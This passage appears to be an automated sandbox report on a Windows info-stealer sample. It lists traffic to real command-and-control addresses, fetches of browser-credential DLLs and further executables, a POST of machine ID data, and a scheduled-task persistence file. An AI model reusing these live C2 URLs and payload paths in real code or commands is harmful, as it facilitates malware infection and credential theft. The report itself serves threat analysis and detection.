Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=lmDFwrhCuHnRvEP&MD=nmXmm8Lk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=lmDFwrhCuHnRvEP&MD=nmXmm8Lk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ogs.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: atten-supporse.biz

Source: unknown

HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAEHDHIIJKECBKEBAHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 43 42 39 37 33 32 30 44 44 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 2d 2d 0d 0a Data Ascii: ------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="hwid"ECB97320DD0F807656615------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="build"drum------BGDAAEHDHIIJKECBKEBA--

Source: skotes.exe, 00000014.00000002.2653686921.000000000129E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: skotes.exe, 00000014.00000002.2653686921.000000000129E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exec61395d7
Source: skotes.exe, 00000014.00000002.2653686921.000000000129E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exelencoded
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1975584108.0000000000F88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, 00000000.00000002.1975584108.0000000000F88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exee
Source: file.exe, 00000000.00000002.1970779986.0000000000424000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1970779986.0000000000507000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1975584108.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1975584108.0000000000F88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: file.exe, 00000000.00000002.1975584108.0000000000F88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: file.exe, 00000000.00000002.1975584108.0000000000F88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dllu
Source: file.exe, 00000000.00000002.1975584108.0000000000F88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: file.exe, 00000000.00000002.1975584108.0000000000F88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll.
Source: file.exe, 00000000.00000002.1975584108.0000000000F88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: file.exe, 00000000.00000002.1975584108.0000000000F88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: file.exe, 00000000.00000002.1975584108.0000000000F88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: file.exe, 00000000.00000002.1975584108.0000000000F88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dllk
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: file.exe, 00000000.00000002.1975584108.0000000000F88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/=
Source: file.exe, 00000000.00000002.1975584108.0000000000F88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/_
Source: file.exe, 00000000.00000002.1970779986.0000000000424000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2010313915.0000000023650000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1970779986.0000000000507000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.1970779986.0000000000507000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php423177b60194262422f8d727cf88
Source: file.exe, 00000000.00000002.1975584108.0000000000F74000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpDI
Source: file.exe, 00000000.00000002.2010313915.0000000023650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpLy
Source: file.exe, 00000000.00000002.1970779986.0000000000424000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpation
Source: file.exe, 00000000.00000002.2010313915.0000000023650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpp
Source: file.exe, 00000000.00000002.1970779986.0000000000507000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206AKKming
Source: skotes.exe, 00000014.00000002.2653686921.000000000129E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpS
Source: skotes.exe, 00000014.00000002.2653686921.000000000129E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php_
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: chromecache_105.5.dr	String found in binary or memory: http://www.broofa.com
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2015373067.000000006FE3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2014124649.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, JJJJEBGD.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_105.5.dr	String found in binary or memory: https://apis.google.com
Source: file.exe, 00000000.00000002.2010313915.0000000023650000.00000004.00000020.00020000.00000000.sdmp, CBAKEBGIIDAFIDHIIECF.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: file.exe, 00000000.00000002.2010313915.0000000023650000.00000004.00000020.00020000.00000000.sdmp, CBAKEBGIIDAFIDHIIECF.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, JJJJEBGD.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, JJJJEBGD.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, JJJJEBGD.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.2010313915.0000000023650000.00000004.00000020.00020000.00000000.sdmp, CBAKEBGIIDAFIDHIIECF.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: file.exe, 00000000.00000002.2010313915.0000000023650000.00000004.00000020.00020000.00000000.sdmp, CBAKEBGIIDAFIDHIIECF.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, JJJJEBGD.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, JJJJEBGD.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, JJJJEBGD.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chromecache_105.5.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_105.5.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_105.5.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_105.5.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: CBAKEBGIIDAFIDHIIECF.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: chromecache_105.5.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: IDHCGDAFBKFIDHJJJDHCBFBGHD.0.dr	String found in binary or memory: https://support.mozilla.org
Source: IDHCGDAFBKFIDHJJJDHCBFBGHD.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: IDHCGDAFBKFIDHJJJDHCBFBGHD.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
Source: file.exe, 00000000.00000002.2010313915.0000000023650000.00000004.00000020.00020000.00000000.sdmp, CBAKEBGIIDAFIDHIIECF.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, JJJJEBGD.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chromecache_105.5.dr	String found in binary or memory: https://www.google.com
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, JJJJEBGD.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chromecache_105.5.dr	String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_105.5.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_105.5.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: file.exe, 00000000.00000002.2010313915.0000000023650000.00000004.00000020.00020000.00000000.sdmp, CBAKEBGIIDAFIDHIIECF.0.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: IDHCGDAFBKFIDHJJJDHCBFBGHD.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.1970779986.0000000000455000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1970779986.0000000000424000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: IDHCGDAFBKFIDHJJJDHCBFBGHD.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: file.exe, 00000000.00000002.1970779986.0000000000455000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1970779986.0000000000424000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: IDHCGDAFBKFIDHJJJDHCBFBGHD.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: IDHCGDAFBKFIDHJJJDHCBFBGHD.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.1970779986.0000000000455000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1857281479.00000000238C7000.00000004.00000020.00020000.00000000.sdmp, IDHCGDAFBKFIDHJJJDHCBFBGHD.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.1970779986.0000000000455000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.8:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.8:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.8:49743 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: KJJJKFIIIJ.exe.0.dr	Static PE information: section name:
Source: KJJJKFIIIJ.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.16.dr	Static PE information: section name:
Source: skotes.exe.16.dr	Static PE information: section name: .idata
Source: random[1].exe.20.dr	Static PE information: section name:
Source: random[1].exe.20.dr	Static PE information: section name: .idata
Source: random[1].exe.20.dr	Static PE information: section name:
Source: 5762ea743c.exe.20.dr	Static PE information: section name:
Source: 5762ea743c.exe.20.dr	Static PE information: section name: .idata
Source: 5762ea743c.exe.20.dr	Static PE information: section name:

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 20_2_00A2CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,

20_2_00A2CB97

Creates files inside the system directory

Source: C:\Users\user\Documents\KJJJKFIIIJ.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB5ECD0	0_2_6CB5ECD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAFECC0	0_2_6CAFECC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDAC30	0_2_6CBDAC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC6C00	0_2_6CBC6C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB0AC60	0_2_6CB0AC60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB04DB0	0_2_6CB04DB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC8CDC0	0_2_6CC8CDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB96D90	0_2_6CB96D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC2AD50	0_2_6CC2AD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBCED70	0_2_6CBCED70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC88D20	0_2_6CC88D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB86E90	0_2_6CB86E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB0AEC0	0_2_6CB0AEC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA0EC0	0_2_6CBA0EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE0E20	0_2_6CBE0E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9EE70	0_2_6CB9EE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB0EFB0	0_2_6CB0EFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDEFF0	0_2_6CBDEFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB00FE0	0_2_6CB00FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC48FB0	0_2_6CC48FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB06F10	0_2_6CB06F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC2F70	0_2_6CBC2F70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC40F20	0_2_6CC40F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB6EF40	0_2_6CB6EF40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC068E0	0_2_6CC068E0
